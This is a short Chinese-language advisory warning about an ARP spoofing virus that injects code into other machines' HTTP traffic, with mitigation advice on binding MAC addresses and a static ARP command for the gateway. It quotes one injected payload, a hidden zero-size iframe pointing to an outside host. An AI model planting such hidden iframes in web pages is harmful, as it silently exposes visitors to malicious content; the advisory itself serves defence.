请大家注意ARP病毒!
最近网上新出现一种ARP欺骗病毒,主要表现为: 中病毒的机器不仅影响中毒的机器,同时也会影响所在网段的其它机器,将其它机器的HTTP数据包里加入病毒代码。 代码例子如: <html><iframe src=http://www2.89382.cn/wm/css.htm width=0 height=0></iframe> 这种病毒危害非常大!即使你的机器安全性做得很好,可是没办法保证同网段的其它机器安全没有问题!解决办法: 在交换机上绑定你的机器MAC地址和服务器IP(对交换机没有控制权限的需要联系你的服务器托管商协助绑定)同时在你的服务器上也要绑定网关的MAC地址 如:arp -s 220.11.20.1 00:0F:E2:14:83:F5(220.11.20.1为网关IP,00:0F:E2:14:83:F5为网关MAC地址)
|